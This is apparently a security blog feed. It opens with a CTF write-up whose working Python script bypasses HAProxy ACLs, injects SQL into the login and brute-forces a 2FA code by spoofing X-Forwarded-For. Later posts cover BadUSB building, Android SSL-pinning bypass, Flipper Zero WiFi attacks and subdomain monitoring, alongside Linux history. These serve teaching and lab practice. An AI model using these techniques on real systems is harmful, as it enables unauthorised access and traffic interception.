Prepare for the finest magic products out there. However, please be aware that we’ve implemented a specialized protective spell within our web application to guard against any black magic aimed at our web shop.🔮🎩

Source Code Review

In the haproxy.cfg file, we notice few things.

# External users should be blocked from accessing routes under maintenance.
    http-request deny if { path_beg /auth/login }

Access to the path that starts with /auth/login is blocked. This can be easily bypassed with mutations like //auth/login or /xx/../auth/login.

URLs are often normalized by web servers, so both of them will resolve to /auth/login.

Bypass blocked access to verify-2fa

    # Parse the X-Forwarded-For header value if it exists. If it doesn't exist, add the client's IP address to the X-Forwarded-For header.
    http-request add-header X-Forwarded-For %[src] if !{ req.hdr(X-Forwarded-For) -m found }

    # Apply rate limit on the /auth/verify-2fa route.
    acl is_auth_verify_2fa path_beg,url_dec /auth/verify-2fa

    # Checks for valid IPv4 address in X-Forwarded-For header and denies request if malformed IPv4 is found. (Application accepts IP addresses in the range from 0.0.0.0 to 255.255.255.255.)
    acl valid_ipv4 req.hdr(X-Forwarded-For) -m reg ^([01]?[0-9][0-9]?|2[0-4][0-9]|25[0-5])\.([01]?[0-9][0-9]?|2[0-4][0-9]|25[0-5])\.([01]?[0-9][0-9]?|2[0-4][0-9]|25[0-5])\.([01]?[0-9][0-9]?|2[0-4][0-9]|25[0-5])$

    http-request deny deny_status 400 if is_auth_verify_2fa !valid_ipv4

    # Crate a stick-table to track the number of requests from a single IP address. (1min expire)
    stick-table type ip size 100k expire 60s store http_req_rate(60s)

    # Deny users that make more than 20 requests in a small timeframe.
    http-request track-sc0 hdr(X-Forwarded-For) if is_auth_verify_2fa
    http-request deny deny_status 429 if is_auth_verify_2fa { sc_http_req_rate(0) gt 20 }

    # External users should be blocked from accessing routes under maintenance.
    http-request deny if { path_beg /auth/login }

This will keep track of the number of requests made to the /auth/verify-2fa endpoint from the IP based on the X-Forwarded-For header. It will deny requests to /auth/verify-2fa with a 429 status if the request rate exceeds 20 requests per minute per IP.

This can also be easily bypassed by using path mutations. or we can use X-Forwarded-For to use multiple IPs. 20 requests per IP, so we will need 500 IPs to bruteforce a 4-digit code.

In login.py we notice that username AND password are directly appended to the SQLite query. That’s right, we have SQL injection here!

user = query_db(
                f"SELECT username, password FROM users WHERE username = '{username}' AND password = '{password}'",
                one=True,
            )

If we successfully login, it will set a 4-digit 2FA code.

            set_2fa_code(4)

def set_2fa_code(d):
    uwsgi.cache_del("2fa-code")
    uwsgi.cache_set(
        "2fa-code", "".join(random.choices(string.digits, k=d)), 300 # valid for 5 min
    )

Get The Flag

If we successfully login and verify the 2FA, then it will redirect to /dashboard and return the flag. Simple enough, let’s try it.

To login successfully we can use simple payload like ' OR 1=1 OR 'x'='x in the username field.

Now send it to the intruder and bruteforce a 4-digit code for the //auth/verify-2fa endpoint.

Alternatively, we can bruteforce 2FA code through multiple IP addresses via the X-Forwarded-For header.

Below Python code automates that process:

import os
import re
import sys
import threading
import requests


n1, n2, n3, n4 = 1, 0, 0, 0
ips = dict()
url = "http://94.237.59.199:48823"


def get_ip(x):
    global n1, n2, n3, n4, url
    for x2 in range(x, x + 10):
        if n4 < 255:
            n4 += 1
        elif n3 < 255:
            n3 += 1
        elif n2 < 255:
            n2 += 1
        elif n1 < 255:
            n1 += 1
        ip = f"{n1}.{n2}.{n3}.{n4}"
        headers = {
            "X-Forwarded-For": ip,
            "Content-Type": "application/x-www-form-urlencoded",
        }
        response = requests.post(
            f"{url}//x/../auth/login",
            data="username='+OR+1263%3d1263+OR+'RzWd'%3d'OrZt&password=cycAEGAv4OapKYasrIa2vuguAnSgwib5",
            headers=headers,
            proxies={"http": "http://127.0.0.1:8080/"},
            allow_redirects=False,
        )
        if "verify-2fa" not in response.text:
            print(response.text)
            sys.exit("no 2fa!!")
        ips[x2] = ip
        pass
    pass


def brute_force(start, end, ip):
    for i in range(start, end):
        headers = {
            "X-Forwarded-For": ip,
            "Content-Type": "application/x-www-form-urlencoded",
        }
        response = requests.post(
            f"{url}/auth/verify-2fa",
            data=f"2fa-code={i:04}",
            headers=headers,
            proxies={"http": "http://127.0.0.1:8080/"},
        )
        if "flag" in response.text:
            print("IP:", ip)
            matches = re.findall(r"HTB\{(.*?)\}", response.text)
            if matches:
                for match in matches:
                    print("Flag Found: HTB{", match, "}", sep="")
            else:
                print(response.text)
            os._exit(0)
        pass


num_threads = 500
total_numbers = 10000
chunk_size = total_numbers // num_threads
threads = []
threads2 = []
for x in range(50):
    t = threading.Thread(target=get_ip, args=(x * 10,))
    threads2.append(t)
    t.start()
    pass
for t in threads2:
    t.join()

print(f"Total ip: {len(ips)}")
for i in range(num_threads):
    start = i * chunk_size
    end = start + chunk_size
    thread = threading.Thread(target=brute_force, args=(start, end, ips[i]))
    threads.append(thread)
    thread.start()

for thread in threads:
    thread.join()

print("Brute force completed.")

Code output:

Flag: HTB{1_l0v3_h4pr0x1_4cl5_4nd_4ll_1t5_f34tur35}

Happy Hacking

Build a Bad USB Device using Raspberry Pi Pico

Sat, 10 Aug 2024 00:00:00 +0000

What is Bad USB?

When we connect a USB device to the computer, it sends a descriptor containing information such as its type, manufacturer, and product ID. Using this information, the operating system loads the appropriate driver for the device.

However, many common USB flash drives are vulnerable to “BadUSB,” which allows hackers to reprogram the device’s microcontroller to act as a human interface device (HID). This means it can mimic a keyboard and execute customized keystrokes on the target machine.

Build a Bad USB Device

Requirements

We will be using a Raspberry Pi Pico W microcontroller. Raspberry Pi Pico also works.

Installing pico-ducky

To use the Raspberry Pi Pico as a bad USB device, we need to program it to act as an HID (Human Interface Device) device.

A good number of people have already done it. We will be using the Pico-Ducky GitHub repo.

“If I have seen further it is by standing on the shoulders of Giants.” — Isaac Newton

Download the pico-ducky-v2.0-us.zip preconfigured file from the GItHub repo.

Unzip the file; there will be two .uf2 circuitpython files.

adafruit-circuitpython-raspberry_pi_pico-en_US-8.0.0.uf2
adafruit-circuitpython-raspberry_pi_pico_w-en_US-8.0.0.uf2

Press and hold the boot button on the Raspberry Pi Pico and connect it to the computer.

It will show up as a removable media device named RPI-RP2. Copy the circuitpython file to the root of the Pico (RPI-RP2). If you are using Pico W board then copy the adafruit-circuitpython-raspberry_pi_pico_w-en_US-8.0.0.uf2 and if you are using Pico board copy adafruit-circuitpython-raspberry_pi_pico-en_US-8.0.0.uf2.

The device will reboot, and it will reconnect as CIRCUITPY.

Copy the lib folder and all the *.py files to the root of the CIRCUITPY.

Edit the payload.dd file with the Rubber Ducky Payload that you want to execute.

For testing, you can use the following payload:

REM Open Notepad in Windows and type "Hello World!"
REM
DELAY 2000
GUI r
DELAY 1000
STRING notepad
DELAY 500
ENTER
DELAY 2000
STRING Hello World!

Copy the payload.dd file to the root of the CIRCUITPY.

If you are using the Pico W board, edit the secrets.py file to change the name and password for the wifi access point to run the payload using wifi.

Unplug the USB device and reconnect to run the Rubber Ducky payload.

Demo Video

https://www.youtube-nocookie.com/embed/Mskv-wwqtX0

Troubleshoot

USB enable/disable mode

To enable or disable the Pico from showing as a USB mass storage device, connect pin 18 (GND) and pin 20 (GPIO15).

Setup mode

To edit the payload, enter setup mode by connecting pin 1 (GP0) to pin 3 (GND). This will stop it from injecting the payload into your own machine.

Debugging

If you are facing any errors and want to debug, connect to the Raspberry Pi Pico board using a serial connection type. Use tools such as PyTTY.

In PuTTY, connect to the correct COM port using a serial connection type.

References

Happy Hacking

Things you should know about Linux

Tue, 06 Aug 2024 00:00:00 +0000

How Linux was created

History of UNIX

The UNIX operating system was developed by AT&T Corporation’s Bell Laboratories in the late 1960s. In 1969, a team led by computer scientists Ken Thompson and Dennis Ritchie created the first version of UNIX.

The formal presentation of the Unix operating system to the outside world took place at the 1973 Symposium on Operating Systems Principles, where Ritchie and Thompson delivered a paper. This gained interest, but due to a 1956 consent decree in settlement of an antitrust case, the Bell System (the parent organization of Bell Labs) was restricted from entering any business other than “common carrier communications services” and was obligated to license any patents it had upon request. As a result, UNIX could not be commercialized.

In 1983, the U.S. Department of Justice settled its second antitrust case against AT&T, leading to the breakup of the Bell System. This relieved AT&T of the 1956 consent decree and allowed the company to commercialize UNIX.

On another note, various Unix-like operating systems originated from the University of California, Berkeley’s version of Unix, such as the one used today on Apple computers, known as OS X. They are termed “Unix-like” because the developers of the Berkeley Software Distribution (BSD) Unix worked to eliminate all the original AT&T code, ensuring that their software and its descendants could be freely distributed.

Legal issues arose when AT&T’s Unix subsidiary sued Berkeley Software Design, Inc.(BSDi) for copyright infringement and other charges related to BSD; subsequently, the University of California countersued. The resulting legal complications delayed the development of free Unix-like clones, including 386BSD, intended for the Intel 386 chip, which was commonly used in IBM PCs at that time.

The competition among vendors to establish a standard for the Unix operating system in the late 1980s and early 1990s was known as the Unix wars, which ultimately led to the development of POSIX.

Portable Operating System Interface (POSIX)

POSIX, which stands for Portable Operating System Interface, comprises a set of standards defined by the IEEE Computer Society. These standards are aimed at ensuring compatibility among different operating systems.

POSIX encompasses both system and user-level application programming interfaces (APIs), as well as command-line shells and utility interfaces, to facilitate software compatibility (portability) with various Unix versions and other operating systems.

GNU Project

In September 1983, Richard Stallman announced his intention to start coding the GNU Project in a Usenet message.

By June 1987, the project had accumulated and developed free software for an assembler, an almost finished portable optimizing C compiler (GCC), an editor (GNU Emacs), and various Unix utilities such as ls, grep, awk, make, ld, tar, and bash.

By 1992, the GNU project had completed all major operating system utilities but had not completed their proposed kernel, GNU Hurd.

Linux

In April 1991, Linus Torvalds, a 21-year-old computer science student at the University of Helsinki, began working on an operating system inspired by UNIX for personal computers.

On 25 August 1991, Torvalds shared the following message on comp.os.minix, a newsgroup on Usenet:

Hello everybody out there using minix -

I'm doing a (free) operating system (just a hobby, won't be big and
professional like gnu) for 386(486) AT clones.  This has been brewing
since april, and is starting to get ready.  I'd like any feedback on
things people like/dislike in minix, as my OS resembles it somewhat
(same physical layout of the file-system (due to practical reasons)
among other things).

I've currently ported bash(1.08) and gcc(1.40), and things seem to work.
This implies that I'll get something practical within a few months, and
I'd like to know what features most people would want.  Any suggestions
are welcome, but I won't promise I'll implement them :-)

                Linus (torva[...](https://web.archive.org/web/20130509134305/http://groups.google.com/groups/unlock?_done=/group/comp.os.minix/msg/b813d52cbc5a044b&msg=b813d52cbc5a044b)@kruuna.helsinki.fi)

PS.  Yes - it's free of any minix code, and it has a multi-threaded fs.
It is NOT protable (uses 386 task switching etc), and it probably never
will support anything other than AT-harddisks, as that's all I have :-(.

Linus Torvalds originally wanted to name his invention Freax and stored the files under that name for about six months. However, he also considered the name Linux but initially thought it was too egotistical. In September 1991, the files were uploaded to the FTP server (ftp.funet.fi) of FUNET to facilitate development.

Ari Lemmke at Helsinki University of Technology (HUT), who was one of the volunteer administrators for the FTP server, didn’t like the name Freax and decided to name the project Linux on the server without consulting Torvalds. Torvalds later agreed to the name Linux.

GNU/Linux

Torvalds first published the Linux kernel under its own license which had a restriction on commercial activity.

In 1992, he published version 0.99 using the GNU General Public License (GPL). Subsequently, Linux and GNU developers collaborated to integrate GNU components with Linux, creating a fully functional and free operating system.

A stable version (or variant) of GNU can be run by combining the GNU packages with the Linux kernel, making a functional Unix-like system. The GNU project calls this GNU/Linux.

Linux distributions (Distros)

What is the Linux distribution (Distro)?

A Linux distribution is an operating system that includes the Linux kernel, along with a package management system.

The typical components of a Linux distribution are the Linux kernel, an init system (such as systemd, OpenRC, or runit), GNU tools, and libraries. In addition, to provide a desktop interface, a Linux distribution might include a display server, a desktop environment (such as GNOME, MATE, KDE Plasma, Cinnamon, or Xfce), and other related software.

Each distribution is tailored to meet different user needs, such as ease of use, performance, or specific applications. They are designed to serve different purposes. Some are created for enterprise users, while others are intended for home users.
Some are meant to run only on specific systems, such as embedded devices, mobile devices, personal computers, servers, and powerful supercomputers.

Slackware

Slackware is a Linux distribution created by Patrick Volkerding in 1993. Initially based on the Softlanding Linux System, Slackware has served as the foundation for numerous other Linux distributions, particularly the early versions of SUSE Linux. It holds the distinction of being the oldest maintained distribution.

Debian

Debian, also known as Debian GNU/Linux, is a Linux distribution established by Ian Murdock on August 16, 1993.

The word “Debian” comes from the first name of his then-girlfriend (later ex-wife) Debra Lynn and his own first name.

The first version of Debian (0.01) was released on September 15, 1993, and its first stable version (1.1 Buzz) was released on June 17, 1996.

Debian distribution codenames are based on the names of characters from the Toy Story films. The Debian Stable branch is the most popular edition for personal computers and servers. Known for its stability and extensive software repository.

Debian is also the foundation for many other distributions that serve different purposes, such as Proxmox for servers, Ubuntu or [Linux Mint](Linux Mint: Home Linux Mint https://linuxmint.com) for desktops, Kali for penetration testing, and Pardus and Astra for government use.

Advanced package tool (APT)

The “apt-get” program was the replacement project for “dselect” known by its codename Deity. The first Debian version to include it was Debian 2.1, released on 9 March 1999.

Ubuntu

Ubuntu is a Linux distribution based on Debian, consisting mostly of free and open-source software. It is officially available in multiple editions: desktop, server, and core for Internet of Things devices and robots. It is known for its user-friendliness and large community support. It was first released in October 2004 and is managed by a British company based in London, Canonical Ltd.

Ubuntu releases new versions every six months, with Long-Term Support (LTS) versions every two years that receive five years of support and updates.

Redhat

Founded in 1993, Red Hat, Inc. is an American software company that provides open-source software products to enterprises. IBM acquired Red Hat for US$34 billion in 2019. It’s known for focusing on security, performance, and reliability.

Red Hat primarily uses a subscription-based business model. It generates revenue through subscriptions that provide access to RHEL, consulting services, training and certification.

Its popular descendants include RHEL, Fedora, and CentOS.

Arch & Gentoo

Gentoo Linux was officially released on March 31, 2002. It is known for its source-based package management system, Portage, which allows users to compile software tailored to their specific hardware and preferences.

Arch Linux had its first formal release on March 11, 2002. Arch is known for its simplicity, minimalism, and rolling release model, which ensures users always have access to the latest software updates. It uses a package manager called Pacman.

Both distributions cater to advanced users who prefer a high degree of customization and control over their systems. Arch is also the parent of Manjaro Linux.

Android

Android is an operating system that is based on the Linux kernel, but it differs from traditional Linux distributions such as Ubuntu or Fedora. Unlike traditional Linux distributions, Android does not include GNU software like the GNU C Library; instead, it uses its own C library called Bionic, along with custom components. In addition, Android uses the Android Runtime (ART) for running applications, which is not part of the standard Linux runtime environments.

There are custom versions of Android known as custom ROMs, which offer extra features and customization options. Some popular custom Android distributions include LineageOS, Paranoid Android, and GrapheneOS.

Kernel

The Linux kernel is the core component of the Linux operating system and it is written in C Programming language. It acts as a bridge between the hardware of a computer and its software applications.

When you press the power button on a computer, several steps occur to start the system:

Power On: The power supply turns on and sends a “Power Good” signal to the CPU.
BIOS/UEFI Initialization: The CPU runs the BIOS (Basic Input/Output System) or UEFI (Unified Extensible Firmware Interface), which initializes hardware components and performs a Power-On Self Test (POST).
Bootloader Loading: The BIOS/UEFI loads the bootloader from the Master Boot Record (MBR) or GUID Partition Table (GPT) into RAM.
Kernel Loading: The bootloader loads the operating system kernel into memory and hands over control to it.
Kernel Initialization: The kernel initializes system components, loads drivers, and mounts the root filesystem.
System Services Start: The kernel starts essential system services and daemons.
User Interface Launch: The kernel will initiate applications in user space, launching a graphical user interface (GUI) or command-line interface (CLI).

Here are some key aspects of the Linux kernel:

Resource Management: The kernel manages system resources such as CPU, memory, and I/O devices, ensuring efficient and fair allocation to various processes.
Hardware Abstraction: It provides a layer of abstraction between the hardware and software, allowing applications to interact with hardware without needing to know the specifics of the hardware.
Security: The kernel includes various security features to protect the system from unauthorized access and ensure data integrity.
Modularity: The Linux kernel is modular, meaning it can dynamically load and unload modules (drivers) as needed, allowing for flexibility and extensibility.

System calls

System calls (syscalls) are the fundamental interface between an application and the Linux kernel. They allow user-space programs to request services and resources from the kernel, such as file operations, process management, and network communication.

Shell

A shell is a computer program that provides an interface between the user and the operating system. It allows users to interact with the system by entering commands, which the shell interprets and passes on to the operating system to execute.

Popular flavors of Shell:

Bash (Bourne Again Shell): One of the most widely used shells in Unix-like systems. It offers powerful scripting capabilities and is the default shell in many Linux distributions.
Zsh (Z Shell): Known for its advanced features and customization options, making it popular among power users.
Fish (Friendly Interactive Shell): Focuses on user-friendliness and includes features like syntax highlighting and autosuggestions.

Linux file system

Hierarchical Structure

The Linux file system is organized in a hierarchical tree-like structure, starting from the root directory (/). All other directories and files are contained within this root directory. Some of the key directories include:

/bin: Contains essential user binaries (e.g., ls, cp, mv).
/sbin: Contains System binary files.
/boot: Contains boot loader files, including the kernel.
/dev: Contains device files that represent hardware devices.
/etc: Contains system configuration files.
/home: Contains user home directories.
/lib: Contains essential shared libraries.
/media: Used for mounting removable media.
/mnt: Used for temporarily mounting filesystems
/root: Home directory for the root user.
/tmp: Temporary directory. Used to store temporary files.
/usr: These are shareable, read-only files.
/var: Variable data files are stored here. This can include things like log files.

Layers of the Linux File System

Logical File System: Acts as the interface between user applications and the file system, managing operations like opening, reading, and closing files.
Virtual File System (VFS): Provides a standardized interface for multiple physical file systems, allowing them to coexist and operate simultaneously.
Physical File System: Manages the actual storage of data on the disk, handling low-level details of data allocation and retrieval

Common File Systems

ext4: The most widely used file system in Linux, known for its stability and performance.
Btrfs: Designed for high performance and advanced features like snapshotting and self-healing.
XFS: Known for its scalability and high performance, especially with large files.
ZFS: Offers advanced features like data integrity verification and high storage capacity

File Permissions and Ownership

Linux uses a permission and ownership model to control access to files and directories. Each file and directory has:

Owner: The user who owns the file.
Group: A group of users who have specific permissions.
Permissions: Read, write, and execute permissions for the owner, group, and others.

Mounting and Unmounting

Mounting: The process of making a file system accessible at a certain point in the directory tree.
Unmounting: The process of detaching a file system from the directory tree.

Input/Output Redirection

Input and output in the Linux environment are distributed across three streams, which are also numbered: standard input (stdin) (0), standard output (stdout) (1), and standard error (stderr) (2). During standard interactions between the user and the terminal, input is received from the user’s keyboard, while output and errors are displayed as text on the user’s terminal.

Stream Redirection

In Linux, there are redirection commands for each stream. These commands can be used to write standard output or standard error to a file. If you write to a file that does not exist, a new file with that name will be created before writing.

Overwrite

Commands with a single bracket overwrite the destination’s existing contents:

>: standard output
<: standard input
2>: Standard error

Append

Commands with a double bracket do not overwrite the destination’s existing contents; instead, they append to it:

>>: standard output
<<: standard input
2>>: standard error

Pipes

Pipes are used to redirect the output of one command to another command. When a command’s standard output is sent to another through a pipe, the first command’s output will be used as input for the second command rather than being printed on the terminal. Only the data returned by the second command will be displayed.

The Linux pipe is represented by a vertical bar |.

Bash Script

A Bash script is a file containing a series of commands written in the Bash (Bourne Again Shell) scripting language. Bash is a command processor that typically runs in a text window where the user types commands that cause actions. A Bash script allows you to automate tasks by writing these commands in a file and executing them as a program.

Shebang

A shebang (also known as a hashbang or sha-bang) is the character sequence #! at the very beginning of a script file in Unix-like operating systems. It specifies the interpreter that should be used to execute the script.

When you run a script, the operating system uses the shebang line to determine which interpreter to use. For example, if your script starts with #!/bin/bash, the system will use the Bash shell to execute the script.
Example:

#!/bin/bash
echo "Hello, World!"

variables

We can define a variable by using the syntax variable_name=value. To access the value of the variable, use $ followed by the variable name.

#!/bin/bash
name="Aftab"  # A simple variable example
echo "Hello $name"

Linux Commands

echo: Takes the message as an argument and prints it to the standard output.

read: Reads the input and assigns it to the variable.

whoami: returns the current user’s username.

su: substitute or switch user, execute commands with the privileges of another user, typically root.

sudo: Super User Do, let’s user run the command as root..

mkdir: Make a new directory.

cd: change directory.

pwd: Print the current working directory.

ls: List files and directories.

export: Set the value for the environment variable.

chown: change file ownership.

ps: process status, get information about the currently running processes.

htop: monitor system processes in real-time.

crontab: view or edit cron jobs.

kill: terminate processes manually.

grep: search text patterns within files.

sed: stream editor, used to edit text files, with its most common use being to replace occurrences of words in a files.

References

Intercepting Android App Traffic with BurpSuite

Wed, 31 Jul 2024 00:00:00 +0000

Setup Android Device & adb

You can either use the actual Android device or an Android emulator. Any Android emulator such as Genymotion or Android Studio will work.

You can download adb from here.

In the emulator, adb debugging is enabled by default. If you are using an Android device, you will need to enable adb debugging on your device.

Convert BurpSuites Certificate to PEM Format

Once you have Burp running in the background, you can visit the proxy URL to download the certificate.

After downloading the cacert.der BurpSuites certificate file, run the following openssl command to convert this certificate to PEM format.

openssl x509 -inform der -in cacert.der -out burp.pem

Now we need to rename this file to the hash of the subject of the certificate. We can get that using the following command:

openssl x509 -inform pem -subject_hash_old -in burp.pem | head -1

Installing CA Certificate

Installing Certificate from Android settings

To install the CA certificate on Android, go to settings and search for the certificate. Depending on the device, you should be able to see the option to install the certificate.
Locate and install burp.pem, PEM format certificate file we previously converted.

Copying the Certificate to Android device using adb

First, ensure that your Android device appears in the adb devices command.

We need to copy our 9a5ba575.0 file to the /system/etc/security/cacerts/ directory on the Android device.

adb push 9a5ba575.0 /system/etc/security/cacerts/

We get an error saying Read-only file system. To resolve this, We must remount to read-write .

adb shell mount -o remount,rw /system

If you are using Android Studio Emulator you need to start the AVD with -writable-system command argument.

/home/aftab/Android/Sdk/emulator/emulator -list-avds
/home/aftab/Android/Sdk/emulator/emulator -avd Pixel_6_Pro  -writable-system

Setup Proxy

To configure the proxy settings in Android via GUI, you can follow these steps.

or you can use the gdb command to set and unset the proxy.

To set the proxy to 172.24.240.1:8080:

adb shell settings put global http_proxy 172.24.240.1:8080

To unset the proxy:

adb shell settings put global http_proxy :0

Change the burp proxy settings to listen on all the interfaces. After setting up the proxy, you should be able to see some traffic. To test this, you can open any HTTPS site on an Android browser, and you should see that traffic in Burp Suite.

Now that we have installed a certificate and set up a proxy, we are able to view the HTTPS traffic for some apps, but not all. This is because certain applications use SSL pinning, which stops the app from recognizing our intercepting certificate as valid. As a result, we are unable to monitor the traffic between the application and the server.

What is SSL Pinning

SSL pinning is a security technique used on the client side to protect against man-in-the-middle attacks. It works by embedding(or pinning) a list of trusted certificates into the client application during development.
At runtime, the server certificate is compared against the local copy of trusted certificates. If there is a mismatch, the connection is disrupted, preventing any user data from being sent to the server. This ensures that user devices only communicate with trusted, dedicated servers.

Bypassing SSL Certificate Pinning Using Frida (Requires Root)

It is often possible to bypass certificate pinning in most applications within seconds, but only if the app uses the API functions that these tools cover. If the app implements SSL pinning using a custom framework or library, SSL pinning must be manually patched and deactivated, which can be a time-consuming process.

Installing Frida

To install Frida’s CLI tools on PC using pip, run the following command:

pip install frida-tools

We also need to download Frida for Android. To download the frida server for Android, go to the release page and download the suitable frida-server-x.x.x-android-* file.

To figure out which Android file to download, run the following command:

adb shell uname -a

For me, it will be frida-server-16.4.7-android-x86_64.

Running Frida on an Android device

After downloading the Frida server for Android, decompress it and run the following commands to run Frida on Android:

adb push frida-server-16.4.7-android-x86_64 /data/local/tmp/
adb shell "chmod 755 /data/local/tmp/frida-server*"
adb shell "/data/local/tmp/frida-server* &"

To verify Frida is running, run the command frida-ps -U on your PC to list the running processes in Android.

SSL Pinning Bypass Script

Different apps utilize different methods to implement SSL pinning, so there is no one-size-fits-all solution. However, you can try the following general scripts:

Universal Android SSL Pinning Bypass with Frida

Download the frida-android-repinning.js file from here.

Move the burp.pem file, which was previously converted from cacert.der, to /data/local/tmp/cert-der.crt on Android.

adb push burp.pem /data/local/tmp/cert-der.crt

Use frida to run the frida-android-repinning.js code into the target application.

frida -U -l frida-android-repinning.js -f com.test.app

Frida Multiple Unpinning

Download the frida_multiple_unpinning.js file from here or here.

Use frida to run the frida_multiple_unpinning.js code into the target application.

frida -U -l frida_multiple_unpinning.js -f com.test.app

Instagram SSL Pinning Bypass Script

To bypass SSL on the Instagram app, download the instagram-ssl-pinning-bypass.js script and run the following command:

frida -U -l instagram-ssl-pinning-bypass.js -f com.instagram.android

References

Thank you for reading this far. Happy hacking!

Hacking WiFi with Flipper Zero and Marauder

Sun, 21 Jul 2024 00:00:00 +0000

Install Marauder firmware on ESP32

The ESP32 is a flexible microcontroller chip that supports WiFi and Bluetooth. It is commonly utilized in IoT (Internet of Things) projects because of its low cost, low power consumption, dual-core architecture, and wide range of networking possibilities.

Marauder firmware is a suite of WiFi/Bluetooth offensive and defensive tools designed for use with the ESP32.

To install the Marauder firmware on the ESP32, there are multiple options available. As described in the GitHub repository by justcallmekoko, We have the blue pill and red pill available, which you can check out here.

Flashing the Marauder firmware

For flashing Marauder firmware on the ESP32, we will use the FZEasyMarauderFlash Python script, which is the easiest option. You can follow the instructions in this GitHub repo.

Connecting ESP32 to Flipper Zero

For this example, I am using the Momentum firmware in my Flipper Zero.
Additionally, all the Flipper Zero related files can be found in this GitHub repository.

GPIO pins connection

To connect the ESP32 to the Flipper Zero using GPIO pins, we will need four jumper wires that will be connected to the 3V3, GND, RX0, and TX0 GPIO pins.

It’s important to note that the RX and TX labels are in reference to the device itself. Therefore, the RX from one device should be connected to the TX of the other, and vice versa.

ESP32		Flipper Zero
`3V3`	→	`3V3`
`GND`	→	`GND`
`RX0`	→	`TX`
`TX0`	→	`RX`

WiFi Attacks

WiFi attacks involve the active transmission of WiFi data from the ESP32 Marauder. WiFi packets are specially crafted to accomplish a specific transmission goal. The following attacks can be used by the ESP32 Marauder.

To access the Marauder in Flipper Zero goto: Apps > GPIO > ESP > WiFi Marauder.

Rick Roll Beacon

In a Rick Roll Beacon attack, specially crafted beacon frames are transmitted. This causes the lyrics of “Never Gonna Give You Up” to display in the network lists of devices in range of the transmission.

https://www.youtube-nocookie.com/embed/35KG0rjKFFI

Beacon Spam

In the beacon spam attack, the ESP32 broadcasts beacon frames for each SSID contained within its list of SSIDs. We can add SSIDs to the list, or we can generate random names.

https://www.youtube-nocookie.com/embed/zKtVT1SYAVQ

Sniff EAPOL/PMKID

Using Marauder, we can sniff the Wi-Fi packets and capture the four-way Wi-Fi handshakes. To do that, we will capture all the raw packets.

https://www.youtube-nocookie.com/embed/2aMRRhJw0Tk

References

Thank you for reading this far. Happy hacking!

Build a Hackable Router using ESP32

Sat, 20 Jul 2024 00:00:00 +0000

What is ESP32

The ESP32 is a flexible microcontroller chip that supports Wi-Fi and Bluetooth. It is commonly utilized in IoT (Internet of Things) projects because of its low cost, low power consumption, dual-core architecture, and wide range of networking possibilities.

ESP32 NAT Router

Usage scenarios

Expand the range of an existing Wi-Fi network.
Establish an additional Wi-Fi network with a different SSID or password for guests or IoT devices.
Create a Wi-Fi network to intercept and analyze network traffic, including login information.
Create Wi-Fi honeypots for security testing.

Prerequisite

ESP32 microcontroller chip
Computer with Python installed
esptool

After installing Python on our machine, we can use pip to install the esptools.

pip install esptool

Installing Drivers:

OS will attempt to install the necessary drivers for ESP32 automatically. If it fails, We can download CP210x USB to UART Bridge VCP Drivers from here.

Once the drivers are installed, after connecting the esp32 to your computer, We should be able to see it in the Device Manager for Windows.

Flashing ESP32

Download the prebuild binaries from here.

After downloading the pre-built binary from GitHub, unzip it and open a terminal in that directory. Then, run the following command to flash the ESP32.

esptool write_flash 0x0 esp32nat_extended_full_v7.1.1.bin

Click to see Example Output

Automate Subdomain Monitoring

Sun, 14 Jul 2024 00:00:00 +0000

Tool used:

We will use haktrails and subfinder for subdomain enumeration. You can also use other tools of your choice such as owasp-amass. Additionally, we will use notify to send notifications. notify can be configured to send results to various platforms including Slack, Discord, Telegram, Google Chat, Pushover, SMTP, and custom webhooks.

Configuration File Setup

haktrails

To use haktrails, you’ll need to set up your config file containing your SecurityTrails API key.

It will give error that Only business email addresses are allowed, but you can simply use the temp mail and it will work.

subfinder

subfinder can be used immediately after installation, but many sources require API keys to work. To maximize output, you should register for API keys; many providers offer a free version with certain limitations.

Reference: https://docs.projectdiscovery.io/tools/subfinder/install#post-install-configuration

notify

To send the results using the notify tool, we must add the webhooks to the config file. You can find an example config file here.

Gathering existing subdomains

Before running the automation, make sure to first gather the existing subdomains and save them to a file. This way, when you run the final script, you will only receive notifications for any newly discovered domains. If you skip this step, you will be flooded with notifications for hundreds or thousands of subdomains.
Here’s the command you can run to gather the existing subdomains.

subfinder -d target.com -silent -nc -all | tee all-subdomains.txt

Receive notifications

To receive notifications for the newly discovered subdomain, we can use the following simple script.
For Linux, here is the bash script.

#!/bin/bash

domain="target.com"
file_name="path/to/all-subdomains.txt"
subfinder -d $domain -silent -nc -all | tr '[:upper:]' '[:lower:]' | anew $file_name | notify -bulk -silent -provider discord
echo $domain | haktrails subdomains | tr '[:upper:]' '[:lower:]' | anew $file_name | notify -bulk -silent -provider discord

For Windows, here is the Powershell script.

$domain = "target.com"
$file_name = "path\to\all-subdomains.txt"
subfinder -d $domain -silent -nc -all | ForEach-Object { $_.ToLower() } | anew $file_name | notify -bulk -silent -provider discord
echo $domain | haktrails subdomains | ForEach-Object { $_.ToLower() } | anew $file_name | notify -bulk -silent -provider discord

Explanation

To find subdomains, use the commands subfinder -d $domain -silent -nc -all or echo $domain | haktrails subdomains. Then, use tr '[:upper:]' '[:lower:]' or ForEach-Object { $_.ToLower() } to convert the piped input to lowercase because domain names are case insensitive. This step is important as anew will treat different case text as different and we want to avoid duplicate results.

To append all new lines to a file that are not present in file, use the command anew $file_name.

Finally, to send the results to Discord, use the command notify -bulk -silent -provider discord. You can use any provider of your choice.

Continuous Monitoring

Now that we have our script, we want to automatically run this script at certain intervals to continuously monitor the newly discovered subdomains. There are multiple ways to achieve this.

Scheduled Task in windows

In Windows, you can create a scheduled task to automatically run a PowerShell script at specific times or intervals.
You can use the following PowerShell command to create a scheduled task that will run every Sunday at midnight.

Save the PowerShell script as monitor.ps1.

$taskTrigger = New-ScheduledTaskTrigger -Weekly -At 12:00AM -DaysOfWeek Sunday
$Action = New-ScheduledTaskAction -Execute "C:\Program Files\PowerShell\7\pwsh.exe" -Argument "path\to\monitor.ps1"
Register-ScheduledTask -TaskName "Subdomain Monitoring" -Trigger $taskTrigger -Action $Action

Setup cron Jobs in Linux

Basic Crontab Syntax

MIN HOUR DOM MON DOW CMD

MIN for minutes (0 - 59).
HOUR for hours (0 - 23).
DOM for day of the month (1 - 31).
MON for month (1 - 12 or JAN - DEC).
DOW for day of the week (0 - 7 or SUN - SAT).
CMD command.

Examples:

Every Minute
- * * * * * /path/to/script
Every Day at Midnight
- 0 0 * * * /path/to/script
Every 1st of the Month
- 0 0 1 * * /path/to/script
Every Sunday at Midnight
